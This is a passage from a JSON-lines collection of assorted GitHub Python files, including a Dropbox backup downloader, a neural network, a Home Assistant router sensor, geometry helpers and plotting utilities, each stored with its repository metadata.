file to be\n loaded. The function is to be found in this source file.\n\n module_paths is an array of path names where the sources or other\n supporting files are found. In particular, module_paths[0] is the location\n of the PyCascading Python sources, and modules_paths[1] is the location of\n the source file defining the function.\n\n In Hadoop mode (with remote_deploy.sh), the first two -a options must\n specify the archives of the PyCascading sources and the job sources,\n respectively.\n\n Arguments:\n module_name -- the name of the variable read the module into\n file_name -- the file that contains the source for the module\n module_paths -- the locations of the Python sources \n \"\"\"\n # This one should be on the classpath from the job jar or the extracted jar\n from com.twitter.pycascading import Util\n\n cascading_jar = Util.getCascadingJar()\n jython_dir = module_paths[0]\n\n sys.path.extend((cascading_jar, jython_dir + '/python',\n jython_dir + '/python/Lib'))\n sys.path.extend(module_paths[1 : ])\n\n # Allow importing of user-installed Jython packages\n import site\n site.addsitedir(jython_dir + 'python/Lib/site-packages')\n\n # Haha... it's necessary to put this here, otherwise simplejson won't work.\n # Maybe it's automatically imported in the beginning of a Jython program,\n # but since at that point the sys.path is not set yet to Lib, it will fail?\n #import encodings\n\n return imp.load_source(module_name, file_name)\n","repo_name":"ProximaMonkey/pycascading","sub_path":"python/pycascading/init_module.py","file_name":"init_module.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"18084594804","text":"#!/usr/bin/python3\nimport fileinput\nimport json\nimport time\nimport calendar\nimport re\nimport shutil\nimport argparse\nimport logging, sys\nimport math\nimport os\n\nlogging.basicConfig(stream=sys.stderr, level=logging.DEBUG)\n\nparser = argparse.ArgumentParser(\n description=\"Generate word list data based off of aggregate irc chat logs\"\n)\n\nparser.add_argument(\n \"-outfile\",\n help=\"output file to write to\",\n default=\"/home/krowbar/logs/chatcloud_aggregate.json\"\n)\n\nparser.add_argument(\n \"-logpath\",\n type=str,\n help=\"where the log files are kept\",\n default=\"/home/krowbar/logs\",\n)\nparser.add_argument\nargs = parser.parse_args()\n\nchatData = {\n \"columns\": [ \"__TIMESTAMP__\" ],\n \"data\": []\n}\n\nlogging.info(\n \"Generating word graph based off words from \" + args.logpath\n)\n\nlogs = sorted([f for f in os.listdir(args.logpath) if re.match(r'chatcloud_[0-9]{4}_[0-9]{2}.json', f)])\nfor log in logs:\n date = re.findall(\"[0-9]{4}_[0-9]{2}\", log)[0]\n year = re.findall(\"[0-9]{4}\", date)[0]\n if year < '2019':\n continue\n print(\"Processing: {}...\".format(log), end='')\n\n logData = [ date ]\n with open(os.path.join(args.logpath, log), \"r\") as logfile:\n j = json.load(logfile);\n for col in chatData['columns']:\n if col in j.keys():\n logData.append(j[col])\n elif col is not \"__TIMESTAMP__\":\n logData.append(0)\n\n for key in j.keys():\n if key in chatData['columns']:\n continue\n else:\n chatData['columns'].append(key)\n for d in chatData['data']:\n d.append(0)\n # append a 0 in each other chatData.data rows\n logData.append(j[key])\n\n chatData['data'].append(logData);\n print(\" Columns: {}, Records: {}\".format(len(chatData['columns']), len(logData)))\n\nwith open(args.outfile + \".tmp\", \"w\") as tmpFile:\n tmpFile.write(json.dumps(chatData))\n # shutil.move(args.outfile + \".tmp\", args.outfile)\n print(\"Dumped {} records to {}\".format(len(chatData['columns']), args.outfile))\n","repo_name":"RussellChamp/tilde-projects","sub_path":"Code/python/chatgraph.py","file_name":"chatgraph.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"21678956812","text":"import pysam\nimport gffutils\ndb = gffutils.FeatureDB(\"yeast.db\")\ninfile = pysam.AlignmentFile(\"output.sorted.bam\", \"rb\")\noutfile = open(\"gene_FPKM.txt\", \"w\")\n\nmydict = {}\ntotal = 0\n\nfor mRNA in db.features_of_type('mRNA'):\n\tfor CDS in db.children(mRNA, featuretype = 'CDS'):\n\t\tif CDS.chrom != 'chrmt':\n\t\t\tname = CDS[\"Name\"][0]\n\t\t\tcount = infile.count(reference = CDS.chrom, start=CDS.start,end=CDS.stop)\n\t\t\tif CDS.stop-CDS.start != 0:\n\t\t\t\tcount = float(count)/(CDS.stop-CDS.start)*1000000000\n\t\t\t\tmydict[name] = count\n\t\t\t\ttotal += count\n\nfor key, value in sorted(mydict.items()):\n\tFPKM = str(value/total)\n\toutfile.write(key)\n\toutfile.write(\"\\t\")\n\toutfile.write(FPKM)\n\toutfile.write(\"\\n\")\n\t\n\n\n\n","repo_name":"patrickbell12/School_Repository","sub_path":"Homework_6/Problem_3/gff_pys.py","file_name":"gff_pys.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70471963442","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport json\nimport os\nimport sys\n\nimport requests\nimport tqdm\n\n\ndef list_files(token, backup_dir):\n headers = {\n \"Authorization\": \"Bearer {}\".format(token),\n \"Content-Type\": \"application/json\"\n }\n payload = {'path': backup_dir}\n res = requests.post('https://api.dropboxapi.com/2/files/list_folder',\n headers=headers, data=json.dumps(payload))\n if res.status_code != 200:\n sys.stderr.write(\"Error\\n\")\n sys.stderr.write(\"{}\\n\".format(res.text))\n exit(-1)\n\n return json.loads(res.text)\n\n\ndef download(token, path, chunk_size=(1024 ** 2)):\n headers = {\n \"Authorization\": \"Bearer {}\".format(token),\n \"Dropbox-API-Arg\": json.dumps({\"path\": path})\n }\n res = requests.post('https://content.dropboxapi.com/2/files/download',\n headers=headers, stream=True)\n if res.status_code != 200:\n sys.stderr.write(\"Download error\\n\")\n sys.stderr.write(\"{}\\n\".format(res.text))\n exit(-1)\n\n pbar = None\n content_len = int(res.headers.get('Content-Length', 0))\n if content_len:\n pbar = tqdm.tqdm(total=content_len, ncols=100)\n\n for chunk in res.iter_content(chunk_size=chunk_size):\n sys.stdout.buffer.write(chunk)\n if pbar:\n pbar.update(chunk_size)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('backup_dir')\n args = parser.parse_args()\n\n res = list_files(os.environ['DROPBOX_TOKEN'], args.backup_dir)\n paths = [ent['path_display'] for ent in res['entries']]\n paths = [path for path in paths if '.tar.gz' in path]\n paths = sorted(paths)\n\n sys.stderr.write(\"Found {} files\\n\".format(len(paths)))\n for path in paths:\n sys.stderr.write(\"Downloading {}\\n\".format(path))\n download(os.environ['DROPBOX_TOKEN'], path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"belltailjp/wp-backup-dropbox","sub_path":"download_backup.py","file_name":"download_backup.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41450636961","text":"from django.urls import path\n\nfrom .views import ListBookView, AddBookView, DeleteBookView, AddAuthorView, ListAuthorView, DeleteAuthorView, UpdateAuthorView, UpdateBookView, HomePageView\n\nurlpatterns = [\n path('', HomePageView.as_view(), name='home'),\n path('list/book/', ListBookView.as_view(), name='list_book'),\n path('list/author/', ListAuthorView.as_view(), name='list_author'),\n path('add/book', AddBookView.as_view(), name='add_book'),\n path('add/author', AddAuthorView.as_view(), name='add_author'),\n path('delete/book/', DeleteBookView.as_view(), name='delete_book'),\n path('delete/author/', DeleteAuthorView.as_view(), name='delete_author'),\n path('update/book/', UpdateBookView.as_view(), name='edit_book'),\n path('update/author/', UpdateAuthorView.as_view(), name='edit_author'),\n] ","repo_name":"janpipan/Diploma","sub_path":"Test/DjangoApp/djangodatabase/books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1593504221","text":"from setuptools import setup\nwith open(\"README.md\", \"r\") as f:\n long_description = f.read()\nsetup(\n name=\"pypkg_builder\",\n version=\"1.0\",\n description=\"A simple tool for packaging python\",\n package_dir={\"\": \"src\"},\n include_package_data=True,\n url=\"https://github.com/dipson94/packagemaker\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Dipson\",\n classifiers=[\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Programming Language :: Python :: 3.10\",\n \"Operating System :: OS Independent\",\n ],\n install_requires=['pyperclip','flask','datetime'],\n python_requires=\">=3.10\",\n entry_points={\n 'console_scripts': [\n 'pysetup=template_pypackage_builder.__init__:app.run',\n ],\n },\n)\n","repo_name":"dipson94/packagemaker","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19223737175","text":"import numpy as np\r\nfrom scipy.special import expit as sig\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom evaluator import calculate_metrics\r\nfrom load_weights import load_weight\r\n\r\n\r\nclass NET:\r\n\tdef __init__(self, weights=None, train_set=None, test_set=None, output_name=None, n_epochs=None, l_rate=None):\r\n\t\tself.train_set = train_set\r\n\t\tself.test_set = test_set\r\n\t\tself.weights = weights\r\n\t\tself.output_name = output_name\r\n\t\tself.n_epochs = n_epochs\r\n\t\tself.l_rate = l_rate\r\n\t\tself.n_inputs = None\r\n\t\tself.n_hidden = None\r\n\t\tself.n_output = None\r\n\t\tself.w1 = self.w2 = None\r\n\r\n\t\tself.a1 = self.a2 = self.a3 = None\r\n\t\tself.ins2 = self.ins3 = None\r\n\r\n\t\tself.load_initial_weights()\r\n\r\n\t\tif self.train_set is not None:\r\n\t\t\tself.X_train, self.y_train = self.get_data(self.train_set)\r\n\t\telse:\r\n\t\t\tself.X_train, self.y_train = None, None\r\n\r\n\t\tif self.test_set is not None:\r\n\t\t\tself.X_test, self.y_test = self.get_data(self.test_set)\r\n\t\telse:\r\n\t\t\tself.X_test, self.y_test = None, None\r\n\r\n\tdef get_data(self, file_name):\r\n\t\tdata = []\r\n\t\twith open(file_name, 'r') as file:\r\n\t\t\ttemp = file.readline().split()\r\n\t\t\tn_inputs = int(temp[1])\r\n\t\t\tn_outputs = int(temp[2])\r\n\r\n\t\t\tif n_inputs != self.n_inputs:\r\n\t\t\t\traise ValueError('Incorrect input dimensions.')\r\n\t\t\telif n_outputs != self.n_output:\r\n\t\t\t\traise ValueError('Incorrect output dimensions.')\r\n\r\n\t\t\tfor line in file:\r\n\t\t\t\tline = [float(i) for i in line.split()]\r\n\t\t\t\tdata = data + [line]\r\n\r\n\t\t\tx = np.asarray(data).T[:n_inputs].T\r\n\t\t\ty = np.asarray(data).T[n_inputs:].T\r\n\r\n\t\t\treturn x, y\r\n\t\treturn None, None\r\n\r\n\tdef forward_prop(self, x):\r\n\t\tif len(x.shape) != 2 or x.shape[1] != self.n_inputs:\r\n\t\t\traise ValueError('Incorrect input shape ' + str(x.shape) + ' given!')\r\n\t\telse:\r\n\t\t\tx = np.append(-np.ones((len(x), 1)), x, axis=1)\r\n\t\t\tself.a1 = x\r\n\t\t\tself.ins2 = np.matmul(self.a1, self.w1)\r\n\t\t\tself.a2 = sig(self.ins2)\r\n\t\t\tself.a2 = np.append(-np.ones((len(self.a2), 1)), self.a2, axis=1)\r\n\t\t\tself.ins3 = np.matmul(self.a2, self.w2)\r\n\t\t\tself.a3 = sig(self.ins3)\r\n\t\treturn self.a3\r\n\r\n\tdef load_initial_weights(self):\r\n\t\tself.n_inputs, self.n_hidden, self.n_output, self.w1, self.w2 = load_weight(self.weights)\r\n\r\n\tdef test_network(self):\r\n\t\toriginal_results = np.zeros((self.n_output, 4))\r\n\t\ty_hat = np.round(self.forward_prop(self.X_test), 0)\r\n\t\tfor ii in range(self.n_output):\r\n\t\t\toriginal_results[ii, :] = np.reshape(confusion_matrix(self.y_test[:, ii], y_hat[:, ii]), 4)\r\n\t\t\toriginal_results[ii, 0], original_results[ii, 3] = original_results[ii, 3], original_results[ii, 0]\r\n\r\n\t\toriginal_results = np.asarray(original_results, dtype=np.int32)\r\n\t\tacc, precision, recall, f1 = calculate_metrics(original_results)\r\n\r\n\t\tacc = np.expand_dims(acc, 0).T\r\n\t\tprecision = np.expand_dims(precision, 0).T\r\n\t\trecall = np.expand_dims(recall, 0).T\r\n\t\tf1 = np.expand_dims(f1, 0).T\r\n\r\n\t\tresults = np.concatenate((original_results, acc, precision, recall, f1), 1)\r\n\r\n\t\ttemp = np.average(results[:, 4:], axis=0)\r\n\t\ttemp[3] = 2 * temp[1] * temp[2] / (temp[1] + temp[2])\r\n\r\n\t\twith open(self.output_name, 'wb') as f:\r\n\t\t\tfor ii in range(results.shape[0]):\r\n\t\t\t\ttemp_str = '%d %d %d %d %0.3f %0.3f %0.3f %0.3f\\n' % tuple(results[ii, :])\r\n\t\t\t\tf.write(temp_str.encode('utf-8'))\r\n\t\t\ttemp_str = '%0.3f %0.3f %0.3f %0.3f\\n' % calculate_metrics(np.sum(original_results, axis=0, keepdims=True))\r\n\t\t\tf.write(temp_str.encode('utf-8'))\r\n\t\t\ttemp_str = '%0.3f %0.3f %0.3f %0.3f\\n' % tuple(temp)\r\n\t\t\tf.write(temp_str.encode('utf-8'))\r\n\r\n\t\t# Return value not used in most cases\r\n\t\treturn np.average(acc)\r\n\r\n\tdef train_network(self):\r\n\r\n\t\tfor _ in range(self.n_epochs):\r\n\t\t\tfor ii in range(len(self.X_train)):\r\n\t\t\t\ttemp_x = self.X_train[ii:ii + 1, :]\r\n\t\t\t\ttemp_y = self.y_train[ii:ii + 1, :]\r\n\t\t\t\tself.forward_prop(temp_x)\r\n\t\t\t\tdelta3 = dsig(self.ins3) * (temp_y - self.a3)\r\n\t\t\t\tdelta2 = dsig(self.ins2) * np.matmul(delta3, self.w2[1:, ].T)\r\n\t\t\t\tself.w2 += self.l_rate * np.matmul(self.a2.T, delta3)\r\n\t\t\t\tself.w1 += self.l_rate * np.matmul(self.a1.T, delta2)\r\n\r\n\t\twith open(self.output_name, 'wb') as f:\r\n\t\t\ttemp_str = '%d %d %d\\n' % (self.n_inputs, self.n_hidden, self.n_output)\r\n\t\t\tf.write(temp_str.encode('utf-8'))\r\n\r\n\t\t\tnp.savetxt(f, self.w1.T, '%0.3f', delimiter=' ')\r\n\r\n\t\t\tnp.savetxt(f, self.w2.T, '%0.3f', delimiter = ' ')\r\n\r\ndef dsig(x):\r\n\treturn sig(x) * (1 - sig(x))\r\n","repo_name":"seyunkim0114/AI_Project2","sub_path":"NeuralNet.py","file_name":"NeuralNet.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70537100404","text":"\"\"\"AsusRouter binary sensors.\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\n\n_LOGGER = logging.getLogger(__name__)\n\nfrom typing import Any\n\nfrom homeassistant.components.binary_sensor import (\n DEVICE_CLASS_CONNECTIVITY,\n BinarySensorEntity,\n)\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity import EntityCategory\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.update_coordinator import (\n CoordinatorEntity,\n DataUpdateCoordinator,\n)\n\nfrom .const import DATA_ASUSROUTER, DOMAIN, KEY_COORDINATOR, SENSORS_TYPE_WAN\nfrom .dataclass import ARBinarySensorDescription\nfrom .router import AsusRouterObj\n\nBINARY_SENSORS = {\n (SENSORS_TYPE_WAN, \"status\"): ARBinarySensorDescription(\n key=\"status\",\n key_group=SENSORS_TYPE_WAN,\n name=\"WAN\",\n entity_category=EntityCategory.DIAGNOSTIC,\n device_class=DEVICE_CLASS_CONNECTIVITY,\n entity_registry_enabled_default=True,\n extra_state_attributes={\n \"dns\": \"dns\",\n \"gateway\": \"gateway\",\n \"ip\": \"ip\",\n \"ip_type\": \"ip_type\",\n \"mask\": \"mask\",\n \"private_subnet\": \"private_subnet\",\n },\n ),\n}\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Setup AsusRouter binary sensors.\"\"\"\n\n router: AsusRouterObj = hass.data[DOMAIN][entry.entry_id][DATA_ASUSROUTER]\n entities = []\n\n for sensor_data in router._sensors_coordinator.values():\n coordinator = sensor_data[KEY_COORDINATOR]\n for sensor_description in BINARY_SENSORS:\n try:\n if sensor_description[0] in sensor_data:\n if (\n BINARY_SENSORS[sensor_description].key\n in sensor_data[sensor_description[0]]\n ):\n entities.append(\n ARBinarySensor(\n coordinator, router, BINARY_SENSORS[sensor_description]\n )\n )\n except Exception as ex:\n _LOGGER.warning(ex)\n\n async_add_entities(entities, True)\n\n\nclass ARBinarySensor(CoordinatorEntity, BinarySensorEntity):\n \"\"\"AsusRouter binary sensor.\"\"\"\n\n def __init__(\n self,\n coordinator: DataUpdateCoordinator,\n router: AsusRouterObj,\n description: ARBinarySensorDescription,\n ) -> None:\n \"\"\"Initialize AsusRouter binary sensor.\"\"\"\n\n super().__init__(coordinator)\n self.entity_description: ARBinarySensorDescription = description\n self.router = router\n self.coordinator = coordinator\n\n self._attr_name = f\"{router._name} {description.name}\"\n self._attr_unique_id = f\"{DOMAIN} {self.name}\"\n self._attr_device_info = router.device_info\n\n @property\n def is_on(self) -> bool:\n \"\"\"Return state.\"\"\"\n\n return self.coordinator.data.get(self.entity_description.key)\n\n @property\n def extra_state_attributes(self) -> dict[str, Any]:\n \"\"\"Return extra state attributes.\"\"\"\n\n description = self.entity_description\n _attributes = description.extra_state_attributes\n if not _attributes:\n return {}\n\n attributes = {}\n\n for attr in _attributes:\n if attr in self.coordinator.data:\n attributes[_attributes[attr]] = self.coordinator.data[attr]\n\n return attributes\n","repo_name":"bittles/hassio_config_and_addons","sub_path":"config/custom_components/asusrouter/binary_sensor.py","file_name":"binary_sensor.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"13481230077","text":"from matplotlib import pyplot as plt\nimport matplotlib.cm as cm\nfrom scipy import spatial\n\nSMALL_SIZE = 8\nMEDIUM_SIZE = 10\nBIGGER_SIZE = 12\n\n# adjust font sizes (https://stackoverflow.com/questions/3899980/how-to-change-the-font-size-on-a-matplotlib-plot)\nplt.rc('font', size=BIGGER_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=BIGGER_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=BIGGER_SIZE) \t# fontsize of the x and y labels\nplt.rc('xtick', labelsize=BIGGER_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=BIGGER_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=BIGGER_SIZE) # legend fontsize\nplt.rc('figure', titlesize=BIGGER_SIZE) \t# fontsize of the figure title\n\ndef visualizeHeatPC(scan, gt):\n\tfig = plt.figure(figsize=(5, 5))\n\tax = fig.add_subplot(111, projection=\"3d\")\n\tgtKDTree = spatial.KDTree(gt)\n\tdistances, indexes = gtKDTree.query(scan)\n\tax.scatter(scan[:, 0], scan[:, 1], scan[:, 2], c=distances, cmap=cm.jet)\n\tplt.show()\n\ndef visualizeOnePC(pc, filename=\"prediction\", axisOff=True):\n\tfig = plt.figure(figsize=(10, 10))\n\tax = fig.add_subplot(111, projection=\"3d\")\n\tax.scatter(pc[:, 0], pc[:, 1], pc[:, 2])\n\tif axisOff:\n\t\tax.set_axis_off()\n\tplt.savefig(f\"{filename}.png\")\n\tplt.show()\n\ndef visualizeTwoPCs(scan, gt):\n\tfig = plt.figure(figsize=(5, 5))\n\tax = fig.add_subplot(111, projection=\"3d\")\n\tax.set_title(\"scan\")\n\tax.scatter(scan[:, 0], scan[:, 1], scan[:, 2])\n\tfig2 = plt.figure(figsize=(5, 5))\n\tax2 = fig2.add_subplot(111, projection=\"3d\")\n\tax2.set_title(\"ground truth\")\n\tax2.scatter(gt[:, 0], gt[:, 1], gt[:, 2])\n\tplt.show()\n\ndef visualizePredictions(train, gt, pred):\n\tfig = plt.figure(figsize=(15, 10))\n\tfor i in range(len(pred)):\n\t\tax = fig.add_subplot(3, len(pred), i + 1, projection=\"3d\")\n\t\tax.scatter(train[i, :, 0], train[i, :, 1], train[i, :, 2])\n\t\tax.set_axis_off()\n\t\tax = fig.add_subplot(3, len(pred), (i + 1) + len(pred), projection=\"3d\")\n\t\tax.scatter(gt[i, :, 0], gt[i, :, 1], gt[i, :, 2])\n\t\tax.set_axis_off()\n\t\tax = fig.add_subplot(3, len(pred), (i + 1) + 2 * len(pred), projection=\"3d\")\n\t\tax.scatter(pred[i, :, 0], pred[i, :, 1], pred[i, :, 2])\n\t\tax.set_axis_off()\n\tplt.savefig(\"predictions.png\")\n\tplt.show()\n\ndef visualizeHistory(history, loss_only: bool = False, title=\"Model Loss\"):\n\tplt.figure(figsize=(10, 5))\n\tplt.plot(history.history['loss'])\n\tif not loss_only:\n\t\tplt.plot(history.history['val_loss'])\n\tif title is not None:\n\t\tplt.title(title)\n\tplt.ylabel('Loss')\n\tplt.xlabel('Epoch')\n\tplt.legend(['Training', 'Validation'], loc='upper right')\n\tplt.savefig(\"history.png\")\n\tplt.show()\n","repo_name":"Ashen-MG/web-app-for-3d-processing","sub_path":"sharp/utils/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"7571031083","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.animation import FuncAnimation\nfrom scipy.spatial import Delaunay\n\nclass Bubble:\n def __init__(self, center, radius, view_vector):\n self.center = np.array(center)\n self.radius = radius\n self.view_vector = np.array(view_vector)\n\n def update(self, dt):\n self.center += np.random.normal(scale=0.1, size=3)\n self.radius += np.random.normal(scale=0.01)\n self.view_vector += np.random.normal(scale=0.01, size=3)\n self.view_vector /= np.linalg.norm(self.view_vector)\n\ndef init_bubbles(num_bubbles):\n bubbles = []\n for i in range(num_bubbles):\n center = np.random.normal(scale=10, size=3)\n radius = np.random.uniform(1, 3)\n view_vector = np.random.normal(size=3)\n view_vector /= np.linalg.norm(view_vector)\n bubbles.append(Bubble(center, radius, view_vector))\n return bubbles\n\ndef perform_delaunay(bubbles):\n centers = [b.center for b in bubbles]\n tri = Delaunay(centers)\n return tri.simplices\n\ndef animate_bubbles(bubbles, simplices):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n for simplice in simplices:\n vertices = [bubbles[i].center for i in simplice]\n ax.plot([v[0] for v in vertices], [v[1] for v in vertices], [v[2] for v in vertices], 'k-')\n\n scat = ax.scatter([b.center[0] for b in bubbles], [b.center[1] for b in bubbles], [b.center[2] for b in bubbles], s=[b.radius**2 for b in bubbles])\n\n def update(frame):\n for b in bubbles:\n b.update(dt)\n\n scat._offsets3d = (np.array([b.center[0] for b in bubbles]), np.array([b.center[1] for b in bubbles]), np.array([b.center[2] for b in bubbles]))\n scat._sizes = np.array([b.radius**2 for b in bubbles])\n\n simplices = perform_delaunay(bubbles)\n for line in ax.lines:\n line.set_linewidth(0)\n for simplice in simplices:\n vertices = [bubbles[i].center for i in simplice]\n ax.plot([v[0] for v in vertices], [v[1] for v in vertices], [v[2] for v in vertices], 'k-')\n\n ani = FuncAnimation(fig, update, frames=1000, interval=20, blit=False)\n plt.show()\n\nif __name__ == '__main__':\n num_bubbles = 10\n dt = 0.01\n bubbles = init_bubbles(num_bubbles)\n simplices = perform_delaunay(bubbles)\n animate_bubbles(bubbles, simplices)\n","repo_name":"LexGridnev/Gridnev-s-Bubble-Theory","sub_path":"main3d.py","file_name":"main3d.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39483475011","text":"'''\ngeometry.py\nContains analytical geometry functions to compute line slope, \ndistance between points, line intercepts, and line intersections.\n'''\n\nfrom math import sqrt, fabs\n\n# Python 3.5 has math.inf, but 3.4 does not\nfrom sys import version_info\nif version_info.major == 3 and version_info.minor == 5:\n from math import inf\nelse:\n inf = float(\"inf\")\n\n\ndef floatequals(a, b):\n '''\n Returns True if the floating-point values a and b are\n close enough in value to be considered equal; otherwise,\n the function returns False. The parameters are considered\n equal when they are within 0.001 of each other.\n '''\n return a == b or fabs(a - b) < 0.001\n\n\ndef distance(x1, y1, x2, y2):\n '''\n Computes the distance between the points (x1,y1) and (x2,y2),\n where x1, y1, x2, and y2 are numbers.\n '''\n return sqrt(((x2-x1)**2)+((y2-y1)**2))\n\n\ndef slope(x1, y1, x2, y2):\n '''\n Computes the slope of the line that passes between the points \n (x1,y1) and (x2,y2). The function returns Math.inf if a vertical \n line passes through the two points. The function's behavior is\n undefined if the two points are identical. \n x1, y1, x2, and y2 are numbers.\n '''\n if (x2-x1) == 0:\n return inf\n else:\n return (y2-y1)/(x2-x1)\n\n\ndef intercept(x1, y1, x2, y2):\n '''\n Computes the y-intercept of the non-vertical line that \n passes through the points (x1,y1) and (x2,y2). The \n function returns the x-intercept if the line is vertical. \n Two identical points are interpreted to be on a \n vertical line.\n '''\n if x1 == x2:\n return x1\n else:\n return y1-slope(x1, y1, x2, y2)*x1\n\n\ndef lineequation(x1, y1, x2, y2):\n '''\n Returns a string representation of a line passing through the points\n (x1,y1) and (x2,y2). The result is in the form y = mx + b for \n non-vertical lines and x = b for vertical lines. The representation\n is as simple as possible; e.g., \n y = 3x - 2 not y = 3x + -2\n y = x + 3 not y = 1x + 3\n y = 5 not y = 0x + 5\n x = 4 a vertical line\n '''\n inter = intercept(x1, y1, x2, y2)\n slpe = slope(x1, y1, x2, y2)\n if inter < 0:\n sym = \" - \"\n pinter = abs(inter)\n else:\n sym = \" + \"\n pinter = inter\n if slpe == inf:\n return \"x = \" + str(x1)\n elif slpe == 0:\n return \"y = \" + str(inter)\n elif slpe == 1 and inter == 0:\n return \"y = \" + \"x\"\n elif slpe == 1:\n return \"y = \" + \"x\" + sym + str(pinter)\n elif inter == 0:\n return \"y = \" + str(slpe) + \"x\"\n else:\n return \"y = \" + str(slpe) + \"x\" + sym + str(pinter)\n\ndef intersection(m1, b1, m2, b2):\n '''\n Computes the (i_x, i_x) intersection point of the lines \n y = m1x + b1 and y = m2x + b1. Returns None if the lines \n do not intersect in a single point.\n '''\n if m1 == m2:\n return None\n elif m1 != inf and m2 != inf:\n xv = (b2 - b1) / (m1 - m2)\n yv = (m1 * xv) + b1\n return (xv, yv)\n elif m1 == inf:\n xv = b1\n yv = (m2 * xv) + b2\n return (xv, yv)\n elif m2 == inf:\n xv = b2\n yv = (m1 * xv) + b1\n return (xv, yv)\n\n\n\n\nif __name__ == '__main__':\n pass\n\n","repo_name":"NobleWolf42/Python101","sub_path":"Ben Labs/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"34601227078","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 9 23:06:51 2022\n\n@author: javi\n\"\"\"\nimport numpy as np\nfrom joblib import Parallel, delayed\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import check_cv\nfrom sklearn.utils import check_X_y\nfrom sklearn.ensemble._base import _fit_single_estimator\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.base import TransformerMixin, is_classifier, is_regressor, clone\nfrom sklearn.utils.validation import check_is_fitted\n\nfrom my_sklearn_tools.model_selection import check_cv\n\n\nclass ColPredTransform(TransformerMixin):\n \"\"\"Columnwise transformer with predictions. \n \n Each column is replaced with the cross-validated predictions by means of\n a linear regression.\n \n Parameters\n ----------\n \n cv : int, cross-validation generator or iterable, default=None\n Determines the cross-validation splitting strategy.\n Possible inputs for cv are:\n \n - None, to use the default 5-fold cross-validation,\n - int, to specify the number of folds.\n - :term:`CV splitter`,\n - An iterable yielding (train, test) splits as arrays of indices.\n For int/None inputs, :class:`KFold` is used.\n Refer :ref:`User Guide ` for the various\n cross-validation strategies that can be used here.\n\n \n verbose : bool or int, default=False\n Amount of verbosity.\n \n n_jobs : int, default=None\n Number of CPUs to use during the cross validation.\n ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.\n ``-1`` means using all processors. \"\"\"\n\n \n def __init__(self, cv=None, n_jobs=-1, verbose=0):\n self.cv = cv\n self.n_jobs = n_jobs\n self.verbose = verbose\n\n def fit(self, X, y):\n\n # Checkings here\n X, y = check_X_y(X, y)\n\n self.n_features_ = X.shape[1]\n \n fitted_estims = Parallel(n_jobs=self.n_jobs)(\n delayed(_fit_single_estimator)(clone(LinearRegression()),\n x[:,None],\n y) for x in X.T\n )\n self.estimators_ = fitted_estims\n \n return self\n\n def transform(self, X):\n\n check_is_fitted(self)\n\n preds = [\n getattr(est, \"pred\")(x[:, None])\n for x, est in zip(X.T, self.estimators_)\n ]\n return np.column_stack(preds)\n\n def fit_transform(self, X, y):\n\n self.fit(X, y)\n\n cv = check_cv(self.cv, y, classifier=False)\n \n preds = Parallel(n_jobs=self.n_jobs)(\n delayed(cross_val_predict)(LinearRegression(),\n x[:, None],\n y,\n cv=cv,\n n_jobs=self.n_jobs,\n verbose=self.verbose) \n for x in X.T)\n \n return np.column_stack(preds)\n","repo_name":"jrasero/my-scikit-tools","sub_path":"my_sklearn_tools/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2081370615","text":"#activity 2\r\n\r\nimport requests\r\nimport hashlib\r\nimport json\r\nimport pandas as pd\r\n#importing 